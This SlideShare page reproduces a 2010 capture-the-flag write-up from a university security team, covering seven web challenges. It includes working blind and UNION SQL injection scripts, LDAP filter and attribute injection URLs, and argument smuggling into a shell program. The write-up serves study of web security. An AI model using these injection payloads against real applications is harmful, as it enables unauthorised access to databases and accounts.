SlideShare a Scribd company logo

Rooted 2010 ppp

N
noc_313

This document summarizes the solutions to 7 challenges from the RootedCon CTF 2010 competition by the Plaid Parliament of Pwning security group. The challenges involved gaining administrator access, exploiting login forms, reading fortune files, following links to files, using SQL injections to view data, making an online purchase, and decrypting packed JavaScript. The solutions used techniques like cookie manipulation, file backups, SQL injections, LDAP injections, and JavaScript unpacking.

Internet
1 of 5
Download to read offline
RootedCon CTF 2010 Plaid Parliament of Pwning - Security Research Group at CMU October 11, 2010 1 Introduction This is a write-up for RootedCon CTF 2010 from Plaid Parliament of Pwning (PPP), Carnegie Mellon University’s Security Research Group. This write-up describes walk-throughs for all the challenges that we have completed during the competition. This report file will also be available at http://ppp.cylab.cmu.edu. 2 Walk-throughs Problem 1:getadmin This page appears to be just a normal page with no normal vulnerabilities. After staring at it for a while, we try to see if there are other files on the webserver that may give us some information. We soon stumble across the page index.php∼, this is a backup file created automatically when, for example, one edits a file in emacs. Reading this source code, we see that when the correct password is sent, the value is administrator gets set to 1. Further, as this php page emulates the actions of register globals, we can try to set this value ourselves. We can see that using post or get requests with the value are specifically filtered, but cookies are not. Set our cookie to contain the value is administrator=1, and then try submitting the form. Flag: t00easy f0r 31337 l1k3 y0u Problem 2:damn login It shows our browser name, so the theory is that it is looking this up in a database. If we throw a single-quote in the user-agent, we cause it to output nothing. It is then trivial, to implement a blind SQL attack. See below for our python script. Flag: Us3r4g3nt l34k3d s0 much 1nf0 Script: 1 #!/ usr/bin/python import string 3 import urllib2 5 target = ’user ()’ test = [] 7 search_space = list(string.lowercase) + list(string.uppercase) + [’@’, ’_’, ’0’, ’1’, ’2’, ’3’, ’4’, ’5’, ’6’, ’7’, ’8’, ’9’] 1
9 def runtest(req , ua): req.add_header(’User -Agent ’, ua % (’’.join(test))) 11 return ’Internet Explorer ’ in urllib2.urlopen(req).read () 13 #ua = "1’,( select /**/ count(TABLE_NAME)/**/ from /**/ information_schema .tables /**/ where /**/( TABLE_SCHEMA /**/ like /**/’ damn_login ’)*( TABLE_NAME /**/ like /**/ ’%s’) like ’1’));#" #ua = "1’,( select /**/ count(TABLE_NAME)/**/ from /**/ information_schema .columns /**/ where /**/( TABLE_NAME /**/ like /**/’ secretpass ’)*( COLUMN_NAME /**/ like /**/ ’%s’)like ’1’));#" 15 ua = "1’,( select /**/ count(pwd)/**/ from /**/ SecretPass /**/ where /**/ binary(pwd)/**/ like /**/ ’%s’));#" 17 req = urllib2.Request(’http :// ctf.rs -labs.com :85/ damn_login_82c5feb95ba26418a402506311c99c7a /’, ’pass=test ’) 19 # get length 21 length = 0 while True: 23 print ’Trying: %s’ % ’’.join(test) if runtest(req , ua): 25 length = len(test) break 27 test.append(’_’) 29 for i in xrange(length): done = False 31 for j in search_space: test[i] = j 33 print ’Trying: %s’ % ’’.join(test) if runtest(req , ua): 35 done = True break 37 if not done: print ’Stopped at ’ + ’’.join(test) 39 break Problem 3:fortune We can see that this webpage simply runs the unix program fortune with whichever arguments are given as the fortune parameter. Many of the special characters that we would want to use to either run arbitrary commands or pass more than one parameter at a time to the fortune program are specifically blocked, giving the error message “Hacking attempt! (non-allowed chars)”. However, after trying many characters, we learn that the tab character (value 0x09) is allowed! This let’s us pass multiple arguments to the fortune program. We submit fortune=-f%09fortunes%2F (where fortunes/ is the folder containing our fortune files) to get a listing of all the files in this folder. The file named key-8b2f0453df4597c4e3cd92215bd2000e immediately sticks out, so we view it by sending fortune=fortunes%2Fkey-8b2f0453df4597c4e3cd92215bd2000e. Flag: Y0u 4r3 m0re lucky th4n y0u th0ught 2
Problem 4:oneweb This problems tells us to read 0fdd8fd4233f8a226ff5a4fe87eee080.html for more instruc- tions. Sadly, upon going there, we see another site that tells us to now go to 415b4dd20fbf84f57ecd9067d46cfd25. Quickly we realize that we are going to need to repeat this process quite a few times, so we quickly create a script using perl. #!/ usr/bin/perl 2 $result = " dc001aeff6413933fa39ce2274c4e7f1 .html "; 4 while ($result =~ m/(w+. html)/) { $result = ‘curl http :// ctf.rs -labs.com :84/ oneweb_e04932f0613ba8c4ecadb225d929fd13 /$1 2>/dev/null ‘; 6 } print $result; Flag: t00 t1r3d f0r th1S 0N3 Problem 5:weblist We see a list of animals and numbers. If we type in one of the numbers, we get the corresponding animal. We can seperate multiple numbers using a space. This is probably be implemented by replacing a space with a comma and the number is sur- rounded by double-quotes, and then throwing into a sql query of the form: ’select id, name from table where id in (...)’. Using this we can start with a blind sql attack to get the schema. Once we have the schema, we can use a union query to get the rest of the information. Flag: cH4nG3d t0 fUcK k4cH4K1l Unions: 1 2") union(select(TABLE_NAME) ,(COLUMN_NAME) ,(1) from( information_schema .columns)) union /**/ select(wl.id) ,(wld.list_id) ,(3) from (( select(id)from(WebList))wl ,( select(list_id)from(WebListDescr))wld)having ("a 3 2") union(select( login_3e1ce4bce9a68db1a1c576d1f76e5aa6 ) ,( password_3e1ce4bce9a666b1a1c576d1f76e5aa6 ) ,(1) from( UserPassword_55cf9c78f77986669bc362385cb55f97 ))union /**/ select(wl.id) ,(wld. list_id) ,(3) from (( select(id)from(WebList))wl ,( select(list_id)from(WebListDescr) )wld)having ("a Blind SQL: 1 #!/ usr/bin/perl 3 foobar (""); #foobar (""); 5 sub foobar { 7 my $prefix = pop(@_); 9 my $i = length($prefix)+1; 11 for my $s (32..122) { 13 $s = chr($s); if($s eq ".") { 3
15 next; } 17 if($i > 4) { next; 19 } 21 ($string = $prefix.$s) =~ s/(.)/sprintf ("%x",ord($1))/eg; my $result = ‘curl "http :// ctf.rs -labs.com :83/ weblist_85baaaf3d4593fcbaeb3878c0357cfd4 /? list =2" , exists(select( concat_ws ("." , TABLE_NAME ,COLUMN_NAME))a/**/ from( information_schema . columns)having(field(binary(substring(a,1,$i)) ,0x$string))) ,"2" 2>/dev/ null ‘; 23 # my $result = ‘curl "http :// ctf.rs -labs.com :83/ weblist_85baaaf3d4593fcbaeb3878c0357cfd4 /? list =2" , exists(select(concat_ws ("." , password))a/**/ from(UserPassword)having(field(binary(substring(a,1, $i)) ,0x$string))) ,"2" 2>/dev/null ‘; 25 if ($result =~ m/perro/ig && $i < 20) { print "n*** $prefix$sn"; 27 foobar($prefix.$s); } 29 } } Problem 6:shop The goal of this problem was to buy an expensive item that would give you the key. After registering and logging on, we notice that we can see, search, and buy products. We also notice that we start with 100 cash and there is no way to increase our cash. When we click ”SEE PRODUCTS” (expensive) we notice that there is a ’>=36’ in the url. By changing this to ‘<=0’, we can see all of the products. This gives us the first hint: “If I were you, I’d try to activate DEBUG mode”. So, if we append ‘&debug=1’ to the URL, we see the raw output of the query. This also tells us that it is an LDAP injection problem. Now, we try to get all of the objects in the LDAP directory, not just products. To do this requires us to negate the requirement: ’ctfPrice <= ...’. Luckily for us, using the search feature, we can inject text both before and after that requirement. This allows us to negate it. The url would look something like: http :// ctf.rs -labs.com :82/ shop_c8f828cc0374f4b1e2187599055ecde2 /?op=busqueda& nombre =*%29%28!%28|%28 ctfPrice %3d1&tipo =%3E%3D36 %29%29& Submit=FIND&debug =1 And now, we get the second hint: You nearly got it. Only one step is missing... Look for ways to increase your cash. Tip3: I am calling ldapadd cmd util from code So, this gives the format of user objects. Since ldapadd treats newlines as delimiters for at- tributes, if we put a newline followed by ’ctfCash: 31337’ we will have enough money to buy the item. For example: 1 http :// ctf.rs -labs.com :82/ shop_c8f828cc0374f4b1e2187599055ecde2 /?op=registro&subop =procesar&username=ppp3&clearpassword=ppp3&nombrecompleto =1%0 ActfCash :%2031337& tlf=ppp2&Submit=Send 4
Now, we buy the item and we get the key: Flag: LD4p 1nj3ct10N rlZzzz Problem 7:scriptures Viewing the source of this page we see a horrible mess of packed javascript. Luckily we recognize this as packed with the popular javascript compressor found at http://dean.edwards.name/packer/, which also handles unpacking (we leave enabling the decode button as an exercise for the reader). Rather than trying to reverse the javascript, we can observe that the cp function does the actual comparison for the password, so we modify it from comparing strings to simply displaying an alert box with the string to which our input is compared. We enter the modified function 1 javascript:function cp(tspaQc3) {var DZr4 = "x6ex6bx75x33x69x75x6ex32x78 x75x32x7a";var d5 = ""; for (i = 0; i < DZr4 [" x6cx65x6ex67x74x68 "]; i++) {d5 += window [" x53x74x72x69x6ex67 "][" x66x72x6fx6dx43x68x61x72 x43x6fx64x65 "](( DZr4 [" x63x68x61x72x43x6fx64x65x41x74 "](i) - (5 * i ) % 3) % 256)}alert (r(d5));};cp(); in the address bar, to automagically print out our key. Flag: y0uw0ntg3tin 3 Acknowledgement As always we thank Professor David Brumley for the guidance and the support. 5

Recommended

PHP Object Injection Vulnerability in WordPress: an Analysis
PHP Object Injection Vulnerability in WordPress: an AnalysisPHP Object Injection Vulnerability in WordPress: an Analysis
PHP Object Injection Vulnerability in WordPress: an AnalysisPositive Hack Days
 
Security Meetup 22 октября. «Реверс-инжиниринг в Enterprise». Алексей Секрето...
Security Meetup 22 октября. «Реверс-инжиниринг в Enterprise». Алексей Секрето...Security Meetup 22 октября. «Реверс-инжиниринг в Enterprise». Алексей Секрето...
Security Meetup 22 октября. «Реверс-инжиниринг в Enterprise». Алексей Секрето...Mail.ru Group
 
php part 2
php part 2php part 2
php part 2Shagufta shaheen
 
Inside a Digital Collection: Historic Clothing in Omeka
Inside a Digital Collection: Historic Clothing in OmekaInside a Digital Collection: Historic Clothing in Omeka
Inside a Digital Collection: Historic Clothing in OmekaArden Kirkland
 
PHP Scripting
PHP ScriptingPHP Scripting
PHP ScriptingReem Alattas
 
SPL, not a bridge too far
SPL, not a bridge too farSPL, not a bridge too far
SPL, not a bridge too farMichelangelo van Dam
 
Php 101: PDO
Php 101: PDOPhp 101: PDO
Php 101: PDOJeremy Kendall
 
The Browser Environment - A Systems Programmer's Perspective [sinatra edition]
The Browser Environment - A Systems Programmer's Perspective [sinatra edition]The Browser Environment - A Systems Programmer's Perspective [sinatra edition]
The Browser Environment - A Systems Programmer's Perspective [sinatra edition]Eleanor McHugh
 

Recommended

PHP Object Injection Vulnerability in WordPress: an Analysis
PHP Object Injection Vulnerability in WordPress: an AnalysisPHP Object Injection Vulnerability in WordPress: an Analysis
PHP Object Injection Vulnerability in WordPress: an AnalysisPositive Hack Days
 
Security Meetup 22 октября. «Реверс-инжиниринг в Enterprise». Алексей Секрето...
Security Meetup 22 октября. «Реверс-инжиниринг в Enterprise». Алексей Секрето...Security Meetup 22 октября. «Реверс-инжиниринг в Enterprise». Алексей Секрето...
Security Meetup 22 октября. «Реверс-инжиниринг в Enterprise». Алексей Секрето...Mail.ru Group
 
php part 2
php part 2php part 2
php part 2Shagufta shaheen
 
Inside a Digital Collection: Historic Clothing in Omeka
Inside a Digital Collection: Historic Clothing in OmekaInside a Digital Collection: Historic Clothing in Omeka
Inside a Digital Collection: Historic Clothing in OmekaArden Kirkland
 
PHP Scripting
PHP ScriptingPHP Scripting
PHP ScriptingReem Alattas
 
SPL, not a bridge too far
SPL, not a bridge too farSPL, not a bridge too far
SPL, not a bridge too farMichelangelo van Dam
 
Php 101: PDO
Php 101: PDOPhp 101: PDO
Php 101: PDOJeremy Kendall
 
The Browser Environment - A Systems Programmer's Perspective [sinatra edition]
The Browser Environment - A Systems Programmer's Perspective [sinatra edition]The Browser Environment - A Systems Programmer's Perspective [sinatra edition]
The Browser Environment - A Systems Programmer's Perspective [sinatra edition]Eleanor McHugh
 
Zend Certification Preparation Tutorial
Zend Certification Preparation TutorialZend Certification Preparation Tutorial
Zend Certification Preparation TutorialLorna Mitchell
 
How I Built a Power Debugger Out of the Standard Library and Things I Found o...
How I Built a Power Debugger Out of the Standard Library and Things I Found o...How I Built a Power Debugger Out of the Standard Library and Things I Found o...
How I Built a Power Debugger Out of the Standard Library and Things I Found o...doughellmann
 
Practical JavaScript Programming - Session 6/8
Practical JavaScript Programming - Session 6/8Practical JavaScript Programming - Session 6/8
Practical JavaScript Programming - Session 6/8Wilson Su
 
Web 11 | AJAX + JSON + PHP
Web 11 | AJAX + JSON + PHPWeb 11 | AJAX + JSON + PHP
Web 11 | AJAX + JSON + PHPMohammad Imam Hossain
 
Web 10 | PHP with MySQL
Web 10 | PHP with MySQLWeb 10 | PHP with MySQL
Web 10 | PHP with MySQLMohammad Imam Hossain
 
Clean code
Clean codeClean code
Clean codeiamAnaCortes
 
32373 uploading-php-shell-through-sql-injection
32373 uploading-php-shell-through-sql-injection32373 uploading-php-shell-through-sql-injection
32373 uploading-php-shell-through-sql-injectionAttaporn Ninsuwan
 
Advanced Django
Advanced DjangoAdvanced Django
Advanced DjangoSimon Willison
 
Swift 함수 커링 사용하기
Swift 함수 커링 사용하기Swift 함수 커링 사용하기
Swift 함수 커링 사용하기진성 오
 
[PL] Jak nie zostać "programistą" PHP?
[PL] Jak nie zostać "programistą" PHP?[PL] Jak nie zostać "programistą" PHP?
[PL] Jak nie zostać "programistą" PHP?Radek Benkel
 
Web2py
Web2pyWeb2py
Web2pyLucas D
 
Speeding up Red Team engagements with carnivorall
Speeding up Red Team engagements with carnivorallSpeeding up Red Team engagements with carnivorall
Speeding up Red Team engagements with carnivorallNullbyte Security Conference
 
Symfony2 Building on Alpha / Beta technology
Symfony2 Building on Alpha / Beta technologySymfony2 Building on Alpha / Beta technology
Symfony2 Building on Alpha / Beta technologyDaniel Knell
 
Notes for xx_use_serialgc
Notes for xx_use_serialgcNotes for xx_use_serialgc
Notes for xx_use_serialgcytoshima
 
PHP Backdoor: The rise of the vuln
PHP Backdoor: The rise of the vulnPHP Backdoor: The rise of the vuln
PHP Backdoor: The rise of the vulnSandro Zaccarini
 
Elixir formatter Internals
Elixir formatter InternalsElixir formatter Internals
Elixir formatter InternalsPedro Medeiros
 
international PHP2011_Bastian Feder_jQuery's Secrets
international PHP2011_Bastian Feder_jQuery's Secretsinternational PHP2011_Bastian Feder_jQuery's Secrets
international PHP2011_Bastian Feder_jQuery's Secretssmueller_sandsmedia
 
PHP Static Code Review
PHP Static Code ReviewPHP Static Code Review
PHP Static Code ReviewDamien Seguy
 
PHP - PDO Objects
PHP - PDO ObjectsPHP - PDO Objects
PHP - PDO ObjectsAJINKYA N
 
Django quickstart
Django quickstartDjango quickstart
Django quickstartMarconi Moreto
 
Metasploit
MetasploitMetasploit
Metasploitnoc_313
 
Banking malware zeu s zombies are using in online banking theft.
Banking malware zeu s zombies are using in online banking theft.Banking malware zeu s zombies are using in online banking theft.
Banking malware zeu s zombies are using in online banking theft.Nahidul Kibria
 

More Related Content

What's hot

Zend Certification Preparation Tutorial
Zend Certification Preparation TutorialZend Certification Preparation Tutorial
Zend Certification Preparation TutorialLorna Mitchell
 
How I Built a Power Debugger Out of the Standard Library and Things I Found o...
How I Built a Power Debugger Out of the Standard Library and Things I Found o...How I Built a Power Debugger Out of the Standard Library and Things I Found o...
How I Built a Power Debugger Out of the Standard Library and Things I Found o...doughellmann
 
Practical JavaScript Programming - Session 6/8
Practical JavaScript Programming - Session 6/8Practical JavaScript Programming - Session 6/8
Practical JavaScript Programming - Session 6/8Wilson Su
 
32373 uploading-php-shell-through-sql-injection
32373 uploading-php-shell-through-sql-injection32373 uploading-php-shell-through-sql-injection
32373 uploading-php-shell-through-sql-injectionAttaporn Ninsuwan
 
Swift 함수 커링 사용하기
Swift 함수 커링 사용하기Swift 함수 커링 사용하기
Swift 함수 커링 사용하기진성 오
 
[PL] Jak nie zostać "programistą" PHP?
[PL] Jak nie zostać "programistą" PHP?[PL] Jak nie zostać "programistą" PHP?
[PL] Jak nie zostać "programistą" PHP?Radek Benkel
 
Symfony2 Building on Alpha / Beta technology
Symfony2 Building on Alpha / Beta technologySymfony2 Building on Alpha / Beta technology
Symfony2 Building on Alpha / Beta technologyDaniel Knell
 
Notes for xx_use_serialgc
Notes for xx_use_serialgcNotes for xx_use_serialgc
Notes for xx_use_serialgcytoshima
 
PHP Backdoor: The rise of the vuln
PHP Backdoor: The rise of the vulnPHP Backdoor: The rise of the vuln
PHP Backdoor: The rise of the vulnSandro Zaccarini
 
Elixir formatter Internals
Elixir formatter InternalsElixir formatter Internals
Elixir formatter InternalsPedro Medeiros
 
international PHP2011_Bastian Feder_jQuery's Secrets
international PHP2011_Bastian Feder_jQuery's Secretsinternational PHP2011_Bastian Feder_jQuery's Secrets
international PHP2011_Bastian Feder_jQuery's Secretssmueller_sandsmedia
 
PHP Static Code Review
PHP Static Code ReviewPHP Static Code Review
PHP Static Code ReviewDamien Seguy
 
PHP - PDO Objects
PHP - PDO ObjectsPHP - PDO Objects
PHP - PDO ObjectsAJINKYA N
 

What's hot (20)

Zend Certification Preparation Tutorial
Zend Certification Preparation TutorialZend Certification Preparation Tutorial
Zend Certification Preparation Tutorial
 
How I Built a Power Debugger Out of the Standard Library and Things I Found o...
How I Built a Power Debugger Out of the Standard Library and Things I Found o...How I Built a Power Debugger Out of the Standard Library and Things I Found o...
How I Built a Power Debugger Out of the Standard Library and Things I Found o...
 
Practical JavaScript Programming - Session 6/8
Practical JavaScript Programming - Session 6/8Practical JavaScript Programming - Session 6/8
Practical JavaScript Programming - Session 6/8
 
Web 11 | AJAX + JSON + PHP
Web 11 | AJAX + JSON + PHPWeb 11 | AJAX + JSON + PHP
Web 11 | AJAX + JSON + PHP
 
Web 10 | PHP with MySQL
Web 10 | PHP with MySQLWeb 10 | PHP with MySQL
Web 10 | PHP with MySQL
 
Clean code
Clean codeClean code
Clean code
 
32373 uploading-php-shell-through-sql-injection
32373 uploading-php-shell-through-sql-injection32373 uploading-php-shell-through-sql-injection
32373 uploading-php-shell-through-sql-injection
 
Advanced Django
Advanced DjangoAdvanced Django
Advanced Django
 
Swift 함수 커링 사용하기
Swift 함수 커링 사용하기Swift 함수 커링 사용하기
Swift 함수 커링 사용하기
 
[PL] Jak nie zostać "programistą" PHP?
[PL] Jak nie zostać "programistą" PHP?[PL] Jak nie zostać "programistą" PHP?
[PL] Jak nie zostać "programistą" PHP?
 
Web2py
Web2pyWeb2py
Web2py
 
Speeding up Red Team engagements with carnivorall
Speeding up Red Team engagements with carnivorallSpeeding up Red Team engagements with carnivorall
Speeding up Red Team engagements with carnivorall
 
Symfony2 Building on Alpha / Beta technology
Symfony2 Building on Alpha / Beta technologySymfony2 Building on Alpha / Beta technology
Symfony2 Building on Alpha / Beta technology
 
Notes for xx_use_serialgc
Notes for xx_use_serialgcNotes for xx_use_serialgc
Notes for xx_use_serialgc
 
PHP Backdoor: The rise of the vuln
PHP Backdoor: The rise of the vulnPHP Backdoor: The rise of the vuln
PHP Backdoor: The rise of the vuln
 
Elixir formatter Internals
Elixir formatter InternalsElixir formatter Internals
Elixir formatter Internals
 
international PHP2011_Bastian Feder_jQuery's Secrets
international PHP2011_Bastian Feder_jQuery's Secretsinternational PHP2011_Bastian Feder_jQuery's Secrets
international PHP2011_Bastian Feder_jQuery's Secrets
 
PHP Static Code Review
PHP Static Code ReviewPHP Static Code Review
PHP Static Code Review
 
PHP - PDO Objects
PHP - PDO ObjectsPHP - PDO Objects
PHP - PDO Objects
 
Django quickstart
Django quickstartDjango quickstart
Django quickstart
 

Viewers also liked

Metasploit
MetasploitMetasploit
Metasploitnoc_313
 
Banking malware zeu s zombies are using in online banking theft.
Banking malware zeu s zombies are using in online banking theft.Banking malware zeu s zombies are using in online banking theft.
Banking malware zeu s zombies are using in online banking theft.Nahidul Kibria
 
DC612 Day - Web Application Security: OWASP Top 10
DC612 Day - Web Application Security: OWASP Top 10DC612 Day - Web Application Security: OWASP Top 10
DC612 Day - Web Application Security: OWASP Top 10dc612
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 

Viewers also liked (8)

Metasploit
MetasploitMetasploit
Metasploit
 
Banking malware zeu s zombies are using in online banking theft.
Banking malware zeu s zombies are using in online banking theft.Banking malware zeu s zombies are using in online banking theft.
Banking malware zeu s zombies are using in online banking theft.
 
DC612 Day - Web Application Security: OWASP Top 10
DC612 Day - Web Application Security: OWASP Top 10DC612 Day - Web Application Security: OWASP Top 10
DC612 Day - Web Application Security: OWASP Top 10
 
OWASP Top Ten
OWASP Top TenOWASP Top Ten
OWASP Top Ten
 
Metasploit
MetasploitMetasploit
Metasploit
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 

Similar to Rooted 2010 ppp

More Secrets of JavaScript Libraries
More Secrets of JavaScript LibrariesMore Secrets of JavaScript Libraries
More Secrets of JavaScript Librariesjeresig
 
Kamil witecki asynchronous, yet readable, code
Kamil witecki asynchronous, yet readable, codeKamil witecki asynchronous, yet readable, code
Kamil witecki asynchronous, yet readable, codeKamil Witecki
 
OWASP Top 10 - DrupalCon Amsterdam 2019
OWASP Top 10 - DrupalCon Amsterdam 2019OWASP Top 10 - DrupalCon Amsterdam 2019
OWASP Top 10 - DrupalCon Amsterdam 2019Ayesh Karunaratne
 
All I Need to Know I Learned by Writing My Own Web Framework
All I Need to Know I Learned by Writing My Own Web FrameworkAll I Need to Know I Learned by Writing My Own Web Framework
All I Need to Know I Learned by Writing My Own Web FrameworkBen Scofield
 
Smarter Interfaces with jQuery (and Drupal)
Smarter Interfaces with jQuery (and Drupal)Smarter Interfaces with jQuery (and Drupal)
Smarter Interfaces with jQuery (and Drupal)aasarava
 
Integrating Flex And Rails With Ruby Amf
Integrating Flex And Rails With Ruby AmfIntegrating Flex And Rails With Ruby Amf
Integrating Flex And Rails With Ruby Amfrailsconf
 
Go Says WAT?
Go Says WAT?Go Says WAT?
Go Says WAT?jonbodner
 
Effecient javascript
Effecient javascriptEffecient javascript
Effecient javascriptmpnkhan
 
Auto-loading of Drupal CCK Nodes
Auto-loading of Drupal CCK NodesAuto-loading of Drupal CCK Nodes
Auto-loading of Drupal CCK Nodesnihiliad
 
[FT-7][snowmantw] How to make a new functional language and make the world be...
[FT-7][snowmantw] How to make a new functional language and make the world be...[FT-7][snowmantw] How to make a new functional language and make the world be...
[FT-7][snowmantw] How to make a new functional language and make the world be...Functional Thursday
 
[DSBW Spring 2009] Unit 07: WebApp Design Patterns & Frameworks (3/3)
[DSBW Spring 2009] Unit 07: WebApp Design Patterns & Frameworks (3/3)[DSBW Spring 2009] Unit 07: WebApp Design Patterns & Frameworks (3/3)
[DSBW Spring 2009] Unit 07: WebApp Design Patterns & Frameworks (3/3)Carles Farré
 
Ruby on Rails Intro
Ruby on Rails IntroRuby on Rails Intro
Ruby on Rails Introzhang tao
 
Being functional in PHP (PHPDay Italy 2016)
Being functional in PHP (PHPDay Italy 2016)Being functional in PHP (PHPDay Italy 2016)
Being functional in PHP (PHPDay Italy 2016)David de Boer
 
Rails 3 overview
Rails 3 overviewRails 3 overview
Rails 3 overviewYehuda Katz
 
My First Rails Plugin - Usertext
My First Rails Plugin - UsertextMy First Rails Plugin - Usertext
My First Rails Plugin - Usertextfrankieroberto
 
TYPO3 Extension development using new Extbase framework
TYPO3 Extension development using new Extbase frameworkTYPO3 Extension development using new Extbase framework
TYPO3 Extension development using new Extbase frameworkChristian Trabold
 
Debugging: Rules & Tools
Debugging: Rules & ToolsDebugging: Rules & Tools
Debugging: Rules & ToolsIan Barber
 

Similar to Rooted 2010 ppp (20)

More Secrets of JavaScript Libraries
More Secrets of JavaScript LibrariesMore Secrets of JavaScript Libraries
More Secrets of JavaScript Libraries
 
Kamil witecki asynchronous, yet readable, code
Kamil witecki asynchronous, yet readable, codeKamil witecki asynchronous, yet readable, code
Kamil witecki asynchronous, yet readable, code
 
OWASP Top 10 - DrupalCon Amsterdam 2019
OWASP Top 10 - DrupalCon Amsterdam 2019OWASP Top 10 - DrupalCon Amsterdam 2019
OWASP Top 10 - DrupalCon Amsterdam 2019
 
All I Need to Know I Learned by Writing My Own Web Framework
All I Need to Know I Learned by Writing My Own Web FrameworkAll I Need to Know I Learned by Writing My Own Web Framework
All I Need to Know I Learned by Writing My Own Web Framework
 
Smarter Interfaces with jQuery (and Drupal)
Smarter Interfaces with jQuery (and Drupal)Smarter Interfaces with jQuery (and Drupal)
Smarter Interfaces with jQuery (and Drupal)
 
Integrating Flex And Rails With Ruby Amf
Integrating Flex And Rails With Ruby AmfIntegrating Flex And Rails With Ruby Amf
Integrating Flex And Rails With Ruby Amf
 
Flex With Rubyamf
Flex With RubyamfFlex With Rubyamf
Flex With Rubyamf
 
Go Says WAT?
Go Says WAT?Go Says WAT?
Go Says WAT?
 
Effecient javascript
Effecient javascriptEffecient javascript
Effecient javascript
 
Auto-loading of Drupal CCK Nodes
Auto-loading of Drupal CCK NodesAuto-loading of Drupal CCK Nodes
Auto-loading of Drupal CCK Nodes
 
[FT-7][snowmantw] How to make a new functional language and make the world be...
[FT-7][snowmantw] How to make a new functional language and make the world be...[FT-7][snowmantw] How to make a new functional language and make the world be...
[FT-7][snowmantw] How to make a new functional language and make the world be...
 
PhpBB meets Symfony2
PhpBB meets Symfony2PhpBB meets Symfony2
PhpBB meets Symfony2
 
[DSBW Spring 2009] Unit 07: WebApp Design Patterns & Frameworks (3/3)
[DSBW Spring 2009] Unit 07: WebApp Design Patterns & Frameworks (3/3)[DSBW Spring 2009] Unit 07: WebApp Design Patterns & Frameworks (3/3)
[DSBW Spring 2009] Unit 07: WebApp Design Patterns & Frameworks (3/3)
 
Ruby on Rails Intro
Ruby on Rails IntroRuby on Rails Intro
Ruby on Rails Intro
 
Being functional in PHP (PHPDay Italy 2016)
Being functional in PHP (PHPDay Italy 2016)Being functional in PHP (PHPDay Italy 2016)
Being functional in PHP (PHPDay Italy 2016)
 
Rails 3 overview
Rails 3 overviewRails 3 overview
Rails 3 overview
 
My First Rails Plugin - Usertext
My First Rails Plugin - UsertextMy First Rails Plugin - Usertext
My First Rails Plugin - Usertext
 
Migrating legacy data
Migrating legacy dataMigrating legacy data
Migrating legacy data
 
TYPO3 Extension development using new Extbase framework
TYPO3 Extension development using new Extbase frameworkTYPO3 Extension development using new Extbase framework
TYPO3 Extension development using new Extbase framework
 
Debugging: Rules & Tools
Debugging: Rules & ToolsDebugging: Rules & Tools
Debugging: Rules & Tools
 

More from noc_313

Guia definitiva de shodan
Guia definitiva de shodanGuia definitiva de shodan
Guia definitiva de shodannoc_313
 
Revista .seguridad pruebas de penetración para principiantes- 5 herramienta...
Revista .seguridad pruebas de penetración para principiantes- 5 herramienta...Revista .seguridad pruebas de penetración para principiantes- 5 herramienta...
Revista .seguridad pruebas de penetración para principiantes- 5 herramienta...noc_313
 
Curso de dibujo para storyboards
Curso de dibujo para storyboardsCurso de dibujo para storyboards
Curso de dibujo para storyboardsnoc_313
 
Xss completo
Xss completoXss completo
Xss completonoc_313
 
Una guia linuxera_para_un_windolero_v3
Una guia linuxera_para_un_windolero_v3Una guia linuxera_para_un_windolero_v3
Una guia linuxera_para_un_windolero_v3noc_313
 
Evasion ids
Evasion idsEvasion ids
Evasion idsnoc_313
 
Test de intrusión
Test de intrusiónTest de intrusión
Test de intrusiónnoc_313
 
Evasion ids
Evasion idsEvasion ids
Evasion idsnoc_313
 
Manual experimental de construcción de antenas wifi
Manual experimental de construcción de antenas wifiManual experimental de construcción de antenas wifi
Manual experimental de construcción de antenas wifinoc_313
 
El sendero del hacker
El sendero del hackerEl sendero del hacker
El sendero del hackernoc_313
 
Manual de uso de nmap
Manual de uso de nmapManual de uso de nmap
Manual de uso de nmapnoc_313
 

More from noc_313 (11)

Guia definitiva de shodan
Guia definitiva de shodanGuia definitiva de shodan
Guia definitiva de shodan
 
Revista .seguridad pruebas de penetración para principiantes- 5 herramienta...
Revista .seguridad pruebas de penetración para principiantes- 5 herramienta...Revista .seguridad pruebas de penetración para principiantes- 5 herramienta...
Revista .seguridad pruebas de penetración para principiantes- 5 herramienta...
 
Curso de dibujo para storyboards
Curso de dibujo para storyboardsCurso de dibujo para storyboards
Curso de dibujo para storyboards
 
Xss completo
Xss completoXss completo
Xss completo
 
Una guia linuxera_para_un_windolero_v3
Una guia linuxera_para_un_windolero_v3Una guia linuxera_para_un_windolero_v3
Una guia linuxera_para_un_windolero_v3
 
Evasion ids
Evasion idsEvasion ids
Evasion ids
 
Test de intrusión
Test de intrusiónTest de intrusión
Test de intrusión
 
Evasion ids
Evasion idsEvasion ids
Evasion ids
 
Manual experimental de construcción de antenas wifi
Manual experimental de construcción de antenas wifiManual experimental de construcción de antenas wifi
Manual experimental de construcción de antenas wifi
 
El sendero del hacker
El sendero del hackerEl sendero del hacker
El sendero del hacker
 
Manual de uso de nmap
Manual de uso de nmapManual de uso de nmap
Manual de uso de nmap
 

Recently uploaded

Loker Pemandu Lagu LC Semarang 085746015303
Loker Pemandu Lagu LC Semarang 085746015303Loker Pemandu Lagu LC Semarang 085746015303
Loker Pemandu Lagu LC Semarang 085746015303Dewi Agency
 
20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdf20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdfMatthew Sinclair
 
一比一原版犹他大学毕业证如何办理
